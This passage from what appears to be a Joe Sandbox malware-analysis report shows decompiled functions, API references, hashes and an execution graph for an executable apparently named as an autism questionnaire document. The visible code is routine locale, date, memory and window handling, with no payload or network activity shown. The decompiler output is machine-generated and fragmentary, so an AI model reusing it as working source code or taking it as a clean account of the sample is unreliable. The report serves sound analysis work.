                                                                                              									if((_v48 & 0xfff) !=  *_v28) {
                                                                                              										E00428AF8(_t306);
                                                                                              									}
                                                                                              									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
                                                                                              									_pop(_t347);
                                                                                              									 *[fs:eax] = _t347;
                                                                                              									_push(0x42fde5);
                                                                                              									return E00429278( &_v48);
                                                                                              								} else {
                                                                                              									if(( *_v28 & 0x0000ffff) == _v12) {
                                                                                              										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                              										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
                                                                                              										goto L41;
                                                                                              									} else {
                                                                                              										_push( &_v48);
                                                                                              										L00427244();
                                                                                              										_push(_t360);
                                                                                              										_push(0x42facc);
                                                                                              										_push( *[fs:eax]);
                                                                                              										 *[fs:eax] = _t363;
                                                                                              										_t311 = _v12 & 0x0000ffff;
                                                                                              										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
                                                                                              										if((_v48 & 0xfff) != _v12) {
                                                                                              											E00428AF8(_t311);
                                                                                              										}
                                                                                              										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
                                                                                              										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
                                                                                              										_pop(_t355);
                                                                                              										 *[fs:eax] = _t355;
                                                                                              										_push(0x42fde5);
                                                                                              										return E00429278( &_v48);
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								E00428BF0(__ecx);
                                                                                              								goto L41;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_v9 = E0042F550(_v8, 0);
                                                                                              							goto L41;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_v9 = E0042F53C(1, 0);
                                                                                              						L41:
                                                                                              						return _v9 & 0x000000ff;
                                                                                              					}
                                                                                              				}
                                                                                              			}
























                                                                                              0x0042facb
                                                                                              0x0042facb
                                                                                              0x0042fa54
                                                                                              0x0042fa24
                                                                                              0x0042fa24
                                                                                              0x00000000
                                                                                              0x0042fa24
                                                                                              0x0042f9fe
                                                                                              0x0042fa0a
                                                                                              0x00000000
                                                                                              0x0042fa0a
                                                                                              0x0042f9e7
                                                                                              0x0042f9f0
                                                                                              0x0042fde5
                                                                                              0x0042fded
                                                                                              0x0042fded
                                                                                              0x0042f9e5

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                              • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                                                              • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                              • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                                                              				char _v8;
                                                                                              				short _v18;
                                                                                              				short _v22;
                                                                                              				struct _SYSTEMTIME _v24;
                                                                                              				short _v536;
                                                                                              				short* _t32;
                                                                                              				intOrPtr* _t47;
                                                                                              				intOrPtr _t56;
                                                                                              				void* _t61;
                                                                                              				intOrPtr _t63;
                                                                                              				void* _t67;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				_t47 = __edx;
                                                                                              				_t61 = __eax;
                                                                                              				_push(_t67);
                                                                                              				_push(0x41c873);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t67 + 0xfffffdec;
                                                                                              				E00407A20(__edx);
                                                                                              				_v24 =  *(_a4 - 2) & 0x0000ffff;
                                                                                              				_v22 =  *(_a4 - 4) & 0x0000ffff;
                                                                                              				_v18 =  *(_a4 - 6) & 0x0000ffff;
                                                                                              				if(_t61 > 2) {
                                                                                              					E00407E48( &_v8, L"yyyy");
                                                                                              				} else {
                                                                                              					E00407E48( &_v8, 0x41c88c);
                                                                                              				}
                                                                                              				_t32 = E004084EC(_v8);
                                                                                              				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
                                                                                              					E0040858C(_t47, 0x100,  &_v536);
                                                                                              					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
                                                                                              						_t63 =  *_t47;
                                                                                              						if(_t63 != 0) {
                                                                                              							_t63 =  *((intOrPtr*)(_t63 - 4));
                                                                                              						}
                                                                                              						E004088AC( *_t47, _t63 - 1, 2, _t47);
                                                                                              					}
                                                                                              				}
                                                                                              				_pop(_t56);
                                                                                              				 *[fs:eax] = _t56;
                                                                                              				_push(0x41c87a);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}

                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                                                              • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: DateFormatLocaleThread
                                                                                              • String ID: $yyyy
                                                                                              • API String ID: 3303714858-404527807
                                                                                              • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                              • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                                                              • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                              • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				char _v534;
                                                                                              				short _v1056;
                                                                                              				short _v1568;
                                                                                              				struct _MEMORY_BASIC_INFORMATION _v1596;
                                                                                              				char _v1600;
                                                                                              				intOrPtr _v1604;
                                                                                              				char _v1608;
                                                                                              				intOrPtr _v1612;
                                                                                              				char _v1616;
                                                                                              				intOrPtr _v1620;
                                                                                              				char _v1624;
                                                                                              				char* _v1628;
                                                                                              				char _v1632;
                                                                                              				char _v1636;
                                                                                              				char _v1640;
                                                                                              				intOrPtr _t55;
                                                                                              				signed int _t76;
                                                                                              				void* _t82;
                                                                                              				intOrPtr _t83;
                                                                                              				intOrPtr _t95;
                                                                                              				intOrPtr _t98;
                                                                                              				intOrPtr _t100;
                                                                                              				intOrPtr* _t102;
                                                                                              				void* _t105;
                                                                                              
                                                                                              				_v1640 = 0;
                                                                                              				_v8 = __ecx;
                                                                                              				_t82 = __edx;
                                                                                              				_t102 = __eax;
                                                                                              				_push(_t105);
                                                                                              				_push(0x41f0a8);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t105 + 0xfffff99c;
                                                                                              				VirtualQuery(__edx,  &_v1596, 0x1c);
                                                                                              				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
                                                                                              					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
                                                                                              					_v12 = E0041EEF0(_t82);
                                                                                              				} else {
                                                                                              					_v12 = _t82 - _v1596.AllocationBase;
                                                                                              				}
                                                                                              				E0041A57C( &_v534, 0x104, E00420608() + 2);
                                                                                              				_t83 = 0x41f0bc;
                                                                                              				_t100 = 0x41f0bc;
                                                                                              				_t95 =  *0x414db8; // 0x414e10
                                                                                              				if(E00405F30(_t102, _t95) != 0) {
                                                                                              					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
                                                                                              					_t76 = E00407F04(_t83);
                                                                                              					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
                                                                                              						_t100 = 0x41f0c0;
                                                                                              					}
                                                                                              				}
                                                                                              				_t55 =  *0x4ba774; // 0x40e708
                                                                                              				_t18 = _t55 + 4; // 0xffec
                                                                                              				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
                                                                                              				E00405BE8( *_t102,  &_v1640);
                                                                                              				_v1636 = _v1640;
                                                                                              				_v1632 = 0x11;
                                                                                              				_v1628 =  &_v534;
                                                                                              				_v1624 = 0xa;
                                                                                              				_v1620 = _v12;
                                                                                              				_v1616 = 5;
                                                                                              				_v1612 = _t83;
                                                                                              				_v1608 = 0xa;
                                                                                              				_v1604 = _t100;
                                                                                              				_v1600 = 0xa;
                                                                                              				E0041A814(4,  &_v1636);
                                                                                              				E00407F04(_v8);
                                                                                              				_pop(_t98);
                                                                                              				 *[fs:eax] = _t98;
                                                                                              				_push(0x41f0af);
                                                                                              				return E00407A20( &_v1640);
                                                                                              			}

                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                              • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                              • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                                                              • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                              • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E0040A6C8(signed short __eax, void* __edx) {
                                                                                              				char _v8;
                                                                                              				char _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed int _v20;
                                                                                              				short _v22;
                                                                                              				short _v24;
                                                                                              				char _v26;
                                                                                              				char _v32;
                                                                                              				void* __ebp;
                                                                                              				void* _t39;
                                                                                              				void* _t55;
                                                                                              				void* _t59;
                                                                                              				short* _t62;
                                                                                              				signed short _t66;
                                                                                              				void* _t67;
                                                                                              				void* _t68;
                                                                                              				signed short _t79;
                                                                                              				void* _t81;
                                                                                              
                                                                                              				_t81 = __edx;
                                                                                              				_t66 = __eax;
                                                                                              				_v16 = 0;
                                                                                              				if(__eax !=  *0x4bdc08()) {
                                                                                              					_v16 = E0040A684( &_v8);
                                                                                              					_t79 = _t66;
                                                                                              					_v20 = 3;
                                                                                              					_t62 =  &_v26;
                                                                                              					do {
                                                                                              						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
                                                                                              						_t79 = (_t79 & 0x0000ffff) >> 4;
                                                                                              						_v20 = _v20 - 1;
                                                                                              						_t62 = _t62 - 2;
                                                                                              					} while (_v20 != 0xffffffff);
                                                                                              					_v24 = 0;
                                                                                              					_v22 = 0;
                                                                                              					 *0x4bdc04(4,  &_v32,  &_v20);
                                                                                              				}
                                                                                              				_t39 = E0040A684( &_v12);
                                                                                              				_t67 = _t39;
                                                                                              				if(_t67 != 0) {
                                                                                              					_t55 = _v12 - 2;
                                                                                              					if(_t55 >= 0) {
                                                                                              						_t59 = _t55 + 1;
                                                                                              						_v20 = 0;
                                                                                              						do {
                                                                                              							if( *((short*)(_t67 + _v20 * 2)) == 0) {
                                                                                              								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
                                                                                              							}
                                                                                              							_v20 = _v20 + 1;
                                                                                              							_t59 = _t59 - 1;
                                                                                              						} while (_t59 != 0);
                                                                                              					}
                                                                                              					E00408550(_t81, _t67);
                                                                                              					_t39 = E0040540C(_t67);
                                                                                              				}
                                                                                              				if(_v16 != 0) {
                                                                                              					 *0x4bdc04(0, 0,  &_v20);
                                                                                              					_t68 = E0040A684( &_v12);
                                                                                              					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
                                                                                              						 *0x4bdc04(8, _v16,  &_v20);
                                                                                              					}
                                                                                              					E0040540C(_t68);
                                                                                              					return E0040540C(_v16);
                                                                                              				}
                                                                                              				return _t39;
                                                                                              			}






















                                                                                              APIs
                                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                                                                • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                                                                • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                                              • String ID:
                                                                                              • API String ID: 2255706666-0
                                                                                              • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                              • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                                                              • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                              • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00420BD8() {
                                                                                              				void* __ebx;
                                                                                              				struct HINSTANCE__* _t1;
                                                                                              				void* _t4;
                                                                                              
                                                                                              				_t1 = GetModuleHandleW(L"kernel32.dll");
                                                                                              				_t3 = _t1;
                                                                                              				if(_t1 != 0) {
                                                                                              					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
                                                                                              					 *0x4b7e30 = _t1;
                                                                                              				}
                                                                                              				if( *0x4b7e30 == 0) {
                                                                                              					 *0x4b7e30 = E0041A4DC;
                                                                                              					return E0041A4DC;
                                                                                              				}
                                                                                              				return _t1;
                                                                                              			}







                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                              • API String ID: 1646373207-1127948838
                                                                                              • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                              • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                                                              • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                              • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:8.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:1.2%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:60

                                                                                              Graph

19561->19573 19562 405a3d 19562->19519 19565 4057eb 19563->19565 19566 4057db 19563->19566 19564->19519 19565->19519 19568 405764 2 API calls 19566->19568 19571 405c58 Sleep 19567->19571 19567->19573 19568->19565 19569->19562 19570 405b1c 19569->19570 19574 405afd Sleep 19569->19574 19580 405b28 19570->19580 19586 4056e8 19570->19586 19571->19561 19572->19569 19576 405acf Sleep 19572->19576 19575 4056e8 VirtualAlloc 19573->19575 19578 405ca0 19573->19578 19574->19570 19577 405b13 Sleep 19574->19577 19575->19578 19576->19559 19577->19569 19578->19519 19580->19519 19582 4057ac 19581->19582 19583 40576d 19581->19583 19582->19551 19582->19552 19583->19582 19584 405778 Sleep 19583->19584 19584->19582 19585 405792 Sleep 19584->19585 19585->19583 19590 40567c 19586->19590 19588 4056f1 VirtualAlloc 19589 405708 19588->19589 19589->19580 19591 40561c 19590->19591 19591->19588 19593 40de90 19592->19593 19594 40dee9 19592->19594 19635 40de30 GetThreadPreferredUILanguages 19593->19635 19595 40de30 2 API calls 19594->19595 19603 40def1 19595->19603 19598 40df32 19599 40df88 19598->19599 19600 40df38 SetThreadPreferredUILanguages 19598->19600 19599->19381 19602 40de30 2 API calls 19600->19602 19604 40df4e 19602->19604 19603->19598 19606 406f28 12 API calls 19603->19606 19605 40df69 SetThreadPreferredUILanguages 19604->19605 19607 40df79 19604->19607 19605->19607 19606->19598 19608 406f28 12 API calls 19607->19608 19609 40df80 19608->19609 19610 406f28 12 API calls 19609->19610 19610->19599 19612 40a1c8 12 API calls 19611->19612 19616 40dcb3 19612->19616 19613 40dd09 19614 40dd1c IsValidLocale 19613->19614 19615 40ddbf 19613->19615 19614->19615 19617 40dd2f GetLocaleInfoW GetLocaleInfoW 19614->19617 19618 40a228 12 API calls 19615->19618 19616->19613 19639 40db98 19616->19639 19621 40dd6a 19617->19621 19619 40dddc GetSystemDefaultUILanguage 19618->19619 19619->19381 19619->19392 19652 40b550 19621->19652 19624 40b474 19623->19624 19626 40b4bf 19623->19626 19625 40b47e 
19624->19625 19632 40a5a8 19624->19632 19625->19626 19627 40b4b4 19625->19627 19628 40b499 19625->19628 19626->19394 19631 40b3f0 12 API calls 19627->19631 19630 40b3f0 12 API calls 19628->19630 19629 40a5ec 19629->19394 19634 40b49e 19630->19634 19631->19634 19632->19629 19633 406f28 12 API calls 19632->19633 19633->19629 19634->19394 19636 40de51 19635->19636 19637 40de6a SetThreadPreferredUILanguages 19635->19637 19638 40de5a GetThreadPreferredUILanguages 19636->19638 19637->19594 19638->19637 19640 40dbbe 19639->19640 19641 40a5f0 12 API calls 19640->19641 19642 40dc40 19640->19642 19643 40dbea 19641->19643 19645 40a228 12 API calls 19642->19645 19644 40a1c8 12 API calls 19643->19644 19648 40dbf1 19644->19648 19646 40dc5a 19645->19646 19646->19613 19647 40b550 12 API calls 19647->19648 19648->19642 19648->19647 19650 40b698 12 API calls 19648->19650 19651 40a5f0 12 API calls 19648->19651 19658 40db2c 19648->19658 19650->19648 19651->19648 19653 40b566 19652->19653 19654 40b5eb 19653->19654 19656 40b5a1 19653->19656 19662 40b3f0 19653->19662 19654->19654 19656->19654 19669 40a5a8 19656->19669 19659 40db3c 19658->19659 19660 40a1c8 12 API calls 19659->19660 19661 40db87 19660->19661 19661->19648 19663 40b43b 19662->19663 19666 40b3fd 19662->19666 19664 40a1ec 12 API calls 19663->19664 19665 40b438 19664->19665 19665->19656 19666->19663 19667 40b415 19666->19667 19667->19665 19673 40a1ec 19667->19673 19670 40a5ac 19669->19670 19671 40a5ec 19670->19671 19672 406f28 12 API calls 19670->19672 19671->19654 19672->19671 19674 40a1f2 19673->19674 19675 40a20d 19673->19675 19674->19675 19676 406f28 12 API calls 19674->19676 19675->19665 19676->19675 19678 40b4cc 19677->19678 19683 40b53a 19677->19683 19679 40b4d4 19678->19679 19680 40a5a8 19678->19680 19682 40a5a8 12 API calls 19679->19682 19679->19683 19685 40b4e3 19679->19685 19681 40a5ec 19680->19681 19684 406f28 12 API calls 19680->19684 19681->19409 19682->19685 19683->19683 19684->19681 19685->19683 19686 40a5a8 12 
API calls 19685->19686 19687 40b536 19686->19687 19687->19409 19689 40e6b5 19688->19689 19690 40e6d2 FindFirstFileW 19689->19690 19691 40e6e2 FindClose 19690->19691 19692 40e6e8 19690->19692 19691->19692 19693 40a1c8 12 API calls 19692->19693 19694 40e6fd 19693->19694 19694->19409 19696 40a2b0 GetUserDefaultUILanguage GetLocaleInfoW 19695->19696 19696->19416 19697 42b8a3 SetErrorMode 19698 405a04 19699 405c64 19698->19699 19700 405a1c 19698->19700 19701 405d7c 19699->19701 19702 405c28 19699->19702 19710 405a2e 19700->19710 19713 405ab9 Sleep 19700->19713 19704 4057b0 VirtualAlloc 19701->19704 19705 405d85 19701->19705 19708 405c42 Sleep 19702->19708 19714 405c82 19702->19714 19703 405a3d 19706 4057eb 19704->19706 19707 4057db 19704->19707 19709 405764 2 API calls 19707->19709 19712 405c58 Sleep 19708->19712 19708->19714 19709->19706 19710->19703 19711 405b1c 19710->19711 19715 405afd Sleep 19710->19715 19720 4056e8 VirtualAlloc 19711->19720 19721 405b28 19711->19721 19712->19702 19713->19710 19717 405acf Sleep 19713->19717 19716 4056e8 VirtualAlloc 19714->19716 19719 405ca0 19714->19719 19715->19711 19718 405b13 Sleep 19715->19718 19716->19719 19717->19700 19718->19710 19720->19721 19722 405d88 19723 405e80 19722->19723 19726 405d9d 19722->19726 19724 405814 19723->19724 19727 405da3 19723->19727 19725 405f7a 19724->19725 19730 405764 2 API calls 19724->19730 19726->19727 19729 405e1a Sleep 19726->19729 19728 405dac 19727->19728 19732 405e5e Sleep 19727->19732 19734 405e95 19727->19734 19729->19727 19731 405e34 Sleep 19729->19731 19733 405825 19730->19733 19731->19726 19732->19734 19735 405e74 Sleep 19732->19735 19736 405855 19733->19736 19737 40583b VirtualFree 19733->19737 19740 405f14 VirtualFree 19734->19740 19741 405eb8 19734->19741 19735->19727 19738 40585e VirtualQuery VirtualFree 19736->19738 19739 40584c 19736->19739 19737->19739 19738->19736 19738->19739 19742 6ace20 19743 6ace42 19742->19743 19744 6ace30 FreeLibrary 19742->19744 19744->19743 19745 
6c4660 19757 410ba8 GetModuleHandleW 19745->19757 19751 6c46d5 19768 6b9870 19751->19768 19753 6c46e7 19799 5b8250 19753->19799 19756 6c4767 19758 410be3 19757->19758 19807 409c2c 19758->19807 19761 6b9800 GetModuleHandleW 19821 414020 19761->19821 19763 6b9815 19764 5b8740 19763->19764 19765 5b874f 19764->19765 19766 5b876c 19764->19766 19765->19766 19767 5b8759 SendMessageW 19765->19767 19766->19751 19767->19766 19832 610358 19768->19832 19770 6b989e 19786 6b99a8 19770->19786 19846 5c6f50 GetCommandLineW 19770->19846 19772 40a228 12 API calls 19774 6b9a16 19772->19774 19776 40a228 12 API calls 19774->19776 19775 6b990d 19777 6b999c 19775->19777 19778 6b9917 19775->19778 19779 6b9a23 19776->19779 19782 6b99aa 19777->19782 19783 6b99a4 19777->19783 19910 5c6fb0 19778->19910 19779->19753 19781 5c6fb0 14 API calls 19797 6b98c2 19781->19797 19931 6b8998 19782->19931 19783->19786 19853 6b9138 19783->19853 19786->19772 19787 6b99bf 19790 40a028 12 API calls 19787->19790 19793 6b99c9 19790->19793 19791 6b9936 19927 5cbf50 19791->19927 19792 6b99de 19795 409ef8 12 API calls 19792->19795 19793->19786 19794 6b98e2 19794->19775 19795->19786 19797->19775 19797->19781 19797->19794 19798 6b9964 19798->19753 19801 5b8264 19799->19801 19800 5b82a9 ShowWindow 19800->19756 19801->19800 19802 5b829c 19801->19802 19803 5b8288 19801->19803 19804 5b8278 SetWindowTextW 19801->19804 19805 40a5a8 12 API calls 19802->19805 19806 5b8295 SetWindowTextW 19803->19806 19804->19802 19805->19800 19806->19802 19808 409c64 19807->19808 19811 409bc0 19808->19811 19812 409c08 GetWindowLongW SetWindowLongW SetErrorMode 19811->19812 19813 409bd0 19811->19813 19812->19761 19813->19812 19816 5c857c FormatMessageW 19813->19816 19820 4103b4 GetSystemInfo 19813->19820 19817 5c85a2 19816->19817 19818 40a350 12 API calls 19817->19818 19819 5c85c2 19818->19819 19819->19813 19820->19813 19822 414054 19821->19822 19823 414048 GetProcAddress 19821->19823 19825 40a1ec 12 API calls 19822->19825 19824 4140a8 
19823->19824 19826 40a1ec 12 API calls 19824->19826 19828 41406a 19825->19828 19827 4140bd 19826->19827 19827->19763 19829 414081 GetProcAddress 19828->19829 19830 40a1ec 12 API calls 19829->19830 19831 4140a0 19830->19831 19831->19763 19833 5c6fb0 14 API calls 19832->19833 19834 61037e 19833->19834 19835 6103c2 19834->19835 19839 61039f 19834->19839 19836 40a5a8 12 API calls 19835->19836 19837 6103cc 19836->19837 19838 40a1c8 12 API calls 19837->19838 19840 6103c0 19838->19840 19841 40b698 12 API calls 19839->19841 19842 40a1c8 12 API calls 19840->19842 19843 6103af 19841->19843 19844 6103e8 19842->19844 19845 40b698 12 API calls 19843->19845 19844->19770 19845->19840 19963 5c6e00 19846->19963 19848 5c6f72 19849 5c6f8b 19848->19849 19850 5c6e00 12 API calls 19848->19850 19851 40a1c8 12 API calls 19849->19851 19850->19848 19852 5c6fa0 19851->19852 19852->19775 19852->19797 19854 6b9140 19853->19854 19854->19854 19855 6b9147 19854->19855 19856 5c6fb0 14 API calls 19855->19856 19858 6b916b 19856->19858 19857 6b917c 19861 5b8250 14 API calls 19857->19861 19858->19857 19859 5c6fb0 14 API calls 19858->19859 19860 6b918f 19859->19860 19860->19857 19864 6b94d5 19860->19864 19862 6b91b4 ShowWindow 19861->19862 19977 6af824 19862->19977 19866 40a228 12 API calls 19864->19866 19869 6b94ef 19866->19869 19868 6b91d7 ShowWindow 19870 6b9210 ShowWindow 19868->19870 19871 6b91f0 19868->19871 19872 40a228 12 API calls 19869->19872 19874 5c6fb0 14 API calls 19870->19874 19985 5b8704 19871->19985 19875 6b94fc 19872->19875 19877 6b9238 19874->19877 19875->19792 19989 5c4f90 19877->19989 19880 5c6fb0 14 API calls 19881 6b9252 19880->19881 19882 5c4f90 12 API calls 19881->19882 19883 6b9262 19882->19883 20000 5c685c 19883->20000 19886 6b9272 20004 5cd6bc 19886->20004 19887 6b9471 20098 423a20 19887->20098 19890 6b927e 19894 5b8250 14 API calls 19890->19894 19892 423a20 5 API calls 19893 6b9481 19892->19893 20107 6b9098 19893->20107 19896 6b92a2 19894->19896 20029 6ac8cc 19896->20029 
